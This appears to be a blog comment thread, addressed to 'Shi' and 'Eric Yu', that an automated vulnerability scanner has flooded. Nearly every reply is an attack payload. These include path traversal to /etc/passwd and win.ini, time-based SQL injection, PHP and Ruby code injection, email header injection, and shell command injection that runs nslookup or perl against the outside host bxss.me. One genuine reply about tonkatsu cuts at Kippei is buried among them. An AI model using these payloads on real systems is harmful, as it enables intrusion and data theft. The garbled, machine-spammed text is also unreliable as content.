/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Shi
;(nslookup hiteafzjhhybpa245d.bxss.me||perl -e "gethostbyname('hiteafzjhhybpa245d.bxss.me')")|(nslookup hiteafzjhhybpa245d.bxss.me||perl -e "gethostbyname('hiteafzjhhybpa245d.bxss.me')")&(nslookup hiteafzjhhybpa245d.bxss.me||perl -e "gethostbyname('hiteafzjhhybpa245d.bxss.me')")
re: Shi
".gethostbyname(lc("hitmi"."heucvzlx9d29b.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(80).chr(120).chr(75)."
re: Shi
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Shi
file:///etc/passwd
re: Shi
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Shi
/\../\../\../\../\../\../\../etc/passwd
re: Shi
Http://bxss.me/t/fit.txt
re: Shi
/WEB-INF/web.xml
re: Shi
http://bxss.me/t/fit.txt%3F.jpg
re: Shi
C:\WINDOWS\system32\drivers\etc\hosts
re: Shi
/etc/shells
re: Shi
../../../../../../../../../../windows/win.ini%00.jpg
re: Shi
c:/windows/win.ini
re: Shi
/../../../../../../../../../../boot.ini
re: Shi
HttP://bxss.me/t/xss.html?%00
re: Shi
"+"A".concat(70-3).concat(22*4).concat(106).concat(75).concat(106).concat(80)+(require"socket"
Socket.gethostbyname("hitbt"+"qdydyyto90d41.bxss.me.")[3].to_s)+"
re: Shi
bxss.me
re: Shi
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Shi
bxss.me/t/xss.html?%00
re: Shi
'+'A'.concat(70-3).concat(22*4).concat(108).concat(73).concat(107).concat(72)+(require'socket'
Socket.gethostbyname('hitmq'+'foujrhnz4621d.bxss.me.')[3].to_s)+'
re: Shi
..\..\..\..\..\..\..\..\windows\win.ini
re: Shi
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Shi
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Shi
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Shi
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Shi
';print(md5(31337));$a='
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Shi
";print(md5(31337));$a="
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Shi
'"
re: Shi
${@print(md5(31337))}
re: Shi
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Shi
<!--
re: Shi
${@print(md5(31337))}\
re: Shi
WEB-INF/web.xml
re: Shi
'.print(md5(31337)).'
re: Shi
WEB-INF\web.xml
re: Shi
1
re: Shi
1
re: Shi
-1 OR 2+33-33-1=0+0+0+1 --
re: Shi
-1 OR 3+33-33-1=0+0+0+1 --
re: Shi
-1 OR 2+666-666-1=0+0+0+1
re: Shi
-1 OR 3+666-666-1=0+0+0+1
re: Shi
-1' OR 2+85-85-1=0+0+0+1 --
re: Shi
-1' OR 3+85-85-1=0+0+0+1 --
re: Shi
-1' OR 2+611-611-1=0+0+0+1 or 'W21V79M7'='
re: Shi
-1' OR 3+611-611-1=0+0+0+1 or 'W21V79M7'='
re: Shi
-1" OR 2+765-765-1=0+0+0+1 --
re: Shi
-1" OR 3+765-765-1=0+0+0+1 --
re: Shi
if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
1 waitfor delay '0:0:15' --
re: Shi
9X2yZaEo'; waitfor delay '0:0:15' --
re: Shi
-5 OR 726=(SELECT 726 FROM PG_SLEEP(15))--
re: Shi
-5) OR 492=(SELECT 492 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 876=(SELECT 876 FROM PG_SLEEP(15))--
re: Shi
UMjb55a8' OR 656=(SELECT 656 FROM PG_SLEEP(15))--
re: Shi
01bcSot2') OR 344=(SELECT 344 FROM PG_SLEEP(15))--
re: Shi
kJDuDBeI')) OR 839=(SELECT 839 FROM PG_SLEEP(15))--
re: Shi
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
1'"
re: Shi
@@I4uEr
Yes Kippei is excellent, and my favourite high temp fry tonkatsu.
I personally go for the Rib Eye because I like my tonkatsu rich. But if you shy away from fat, go for the Fillet. And if you want something in between, the Loin. I'm not sure if wasabi is still an add on, but if it is, you should add it on
re: Eric Yu
tETBDlrT
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+582-582-1=0+0+0+1
re: Eric Yu
-1 OR 3+582-582-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
hstrFDGN'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 140=(SELECT 140 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 293=(SELECT 293 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 237=(SELECT 237 FROM PG_SLEEP(15))--
re: Eric Yu
H25MlAMF' OR 556=(SELECT 556 FROM PG_SLEEP(15))--
re: Eric Yu
u6iKxJnr') OR 536=(SELECT 536 FROM PG_SLEEP(15))--
re: Eric Yu
ut8pLWKq')) OR 400=(SELECT 400 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@84ccx
re: Eric Yu
w7YkmeDV
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+905-905-1=0+0+0+1
re: Eric Yu
-1 OR 3+905-905-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
RW6bm3Sh'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 815=(SELECT 815 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 78=(SELECT 78 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 39=(SELECT 39 FROM PG_SLEEP(15))--
re: Eric Yu
MXDuWzaD' OR 530=(SELECT 530 FROM PG_SLEEP(15))--
re: Eric Yu
ta8MjXDA') OR 740=(SELECT 740 FROM PG_SLEEP(15))--
re: Eric Yu
TzbuH8Hn')) OR 89=(SELECT 89 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@EEo74
re: Eric Yu
1dyzGMmQO
re: Eric Yu
response.write(9340084*9891367)
re: Eric Yu
'+response.write(9340084*9891367)+'
re: Eric Yu
"+response.write(9340084*9891367)+"
re: Eric Yu
%0abcc:074625.67-10113.67.994e2.19990.2@bxss.me
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-10114.67.994e2.19990.2@bxss.me
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
${9999835+10000433}
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
echo dkmifl$()\ fkjwdv\nz^xyu||a #' &echo dkmifl$()\ fkjwdv\nz^xyu||a #|" &echo dkmifl$()\ fkjwdv\nz^xyu||a #
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
&echo qkzzdm$()\ jbjvfl\nz^xyu||a #' &echo qkzzdm$()\ jbjvfl\nz^xyu||a #|" &echo qkzzdm$()\ jbjvfl\nz^xyu||a #
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
|echo ysaegx$()\ mqwwez\nz^xyu||a #' |echo ysaegx$()\ mqwwez\nz^xyu||a #|" |echo ysaegx$()\ mqwwez\nz^xyu||a #
re: Eric Yu
/etc/passwd
re: Eric Yu
(nslookup hitvsevberyludb5a2.bxss.me||perl -e "gethostbyname('hitvsevberyludb5a2.bxss.me')")
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
$(nslookup hitjztmtzvxyw7e1c1.bxss.me||perl -e "gethostbyname('hitjztmtzvxyw7e1c1.bxss.me')")
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
&nslookup hitivlxcfxbolb1881.bxss.me&'\"`0&nslookup hitivlxcfxbolb1881.bxss.me&`'
re: Eric Yu
)
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
&(nslookup hitefybeptoth2203c.bxss.me||perl -e "gethostbyname('hitefybeptoth2203c.bxss.me')")&'\"`0&(nslookup hitefybeptoth2203c.bxss.me||perl -e "gethostbyname('hitefybeptoth2203c.bxss.me')")&`'
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
|(nslookup hityxgozqgupc0bb9f.bxss.me||perl -e "gethostbyname('hityxgozqgupc0bb9f.bxss.me')")
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
`(nslookup hitizdtizsapyfbba3.bxss.me||perl -e "gethostbyname('hitizdtizsapyfbba3.bxss.me')")`
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
;(nslookup hitiuysyvjcuzc9ef4.bxss.me||perl -e "gethostbyname('hitiuysyvjcuzc9ef4.bxss.me')")|(nslookup hitiuysyvjcuzc9ef4.bxss.me||perl -e "gethostbyname('hitiuysyvjcuzc9ef4.bxss.me')")&(nslookup hitiuysyvjcuzc9ef4.bxss.me||perl -e "gethostbyname('hitiuysyvjcuzc9ef4.bxss.me')")
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
file:///etc/passwd
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
/etc/shells
re: Eric Yu
'.gethostbyname(lc('hitgb'.'fxxtrvzg8f17e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(82).chr(111).chr(73).'
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
".gethostbyname(lc("hitdh"."vlmvssik71cfa.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(85).chr(115).chr(67)."
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
bxss.me
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\